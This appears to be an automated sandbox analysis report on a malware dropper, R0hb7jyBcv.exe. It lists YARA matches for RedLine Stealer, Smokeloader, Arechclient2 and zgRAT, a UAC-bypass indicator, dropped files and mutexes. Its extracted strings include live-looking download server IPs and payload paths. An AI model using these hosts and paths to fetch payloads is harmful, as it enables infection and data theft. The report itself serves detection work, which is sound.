Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BC5C5E0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BD809D0 appears 344 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BC23620 appears 119 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BC29B10 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BD39F30 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BD8D930 appears 68 times
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: String function: 024E9F27 appears 48 times
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: String function: 02507A73 appears 43 times
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: String function: 0042780C appears 44 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: String function: 008C14F0 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: String function: 00A49D36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: String function: 6C944701 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: String function: 008C1930 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: String function: 008C1310 appears 36 times

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1144

Source: R0hb7jyBcv.exe, 00000000.00000003.1795183679.00000000026DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1793859449.00000000026C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1793885844.00000000026DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1801742054.000000000271C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798495981.00000000026E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1793904907.00000000026E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1795217889.00000000026E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1795142119.00000000026D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1801068411.00000000026CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000002.1965217585.000000000094B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1795334663.00000000026E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1800965946.00000000026EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798308925.00000000026E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1802184773.00000000026CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798162167.00000000026D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1795452287.00000000026E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000002.1964909196.00000000008D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798555895.00000000026D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798622669.00000000026E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798439918.00000000026CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1794048734.00000000026ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1800721689.00000000026CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1794139931.00000000026F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1801272218.00000000026D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1800855878.00000000026E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1798214774.00000000026E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1800774069.00000000026E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe
Source: R0hb7jyBcv.exe, 00000000.00000003.1793954830.00000000026EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs R0hb7jyBcv.exe

Source: R0hb7jyBcv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 16.2.cmd.exe.4c74e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.cmd.exe.4c30976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.run.exe.3044d5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.run.exe.300086d.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.52f2264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.421986d.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.425d15b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.MSBuild.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 16.2.cmd.exe.4c74264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 13.2.run.exe.304415b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5d600c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.5d600c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.52f2e64.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.425dd5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.52ae976.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2073633195.0000000002F37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\qbji, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, CoreEventSource.cs

Task registration methods: 'MetricManagerCreatedTasks'

Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, HeartbeatDefaultPayload.cs	Suspicious method names: .HeartbeatDefaultPayload.IsDefaultKeyword
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, HeartbeatDefaultPayload.cs	Suspicious method names: .HeartbeatDefaultPayload.PopulateDefaultPayload
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, IHeartbeatDefaultPayloadProvider.cs	Suspicious method names: ..SetDefaultPayload
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.CopyGlobalPropertiesIfRequired
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.ProcessOperationStop
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.Process
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.ProcessOperationStart
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.WriteEvent
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, RichPayloadEventSource.cs	Suspicious method names: .RichPayloadEventSource.Dispose
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1481abd0000.18.raw.unpack, BaseDefaultHeartbeatPropertyProvider.cs	Suspicious method names: .BaseDefaultHeartbeatPropertyProvider.SetDefaultPayload

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@27/62@4/8

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_6BC60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

1_2_6BC60300

Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe

Code function: 2_2_008FD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

2_2_008FD660

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_008F02FE CreateToolhelp32Snapshot,Module32First,

0_2_008F02FE

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe

Code function: 2_2_008D8040 LoadResource,LockResource,SizeofResource,

2_2_008D8040

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5408
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

File created: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Jump to behavior

Source: Yara match	File source: 5.0.u5g0.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.1840725174.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1841736799.00000000038C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: five	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: five	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: @	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.90	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.90	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.90	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: Installed	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: Installed	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.59	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.59	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.203	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.203	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /syncUpd.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /syncUpd.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /timeSync.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /timeSync.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.203	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.59	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /timeSync.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /syncUpd.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /1/Package.zip	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /1/Package.zip	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /1/Package.zip	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .zip	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: .zip	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: \run.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: \run.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /BroomSetup.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /BroomSetup.exe	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: 185.172.128.228	0_2_02504C75
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Command line argument: /BroomSetup.exe	0_2_02504C75
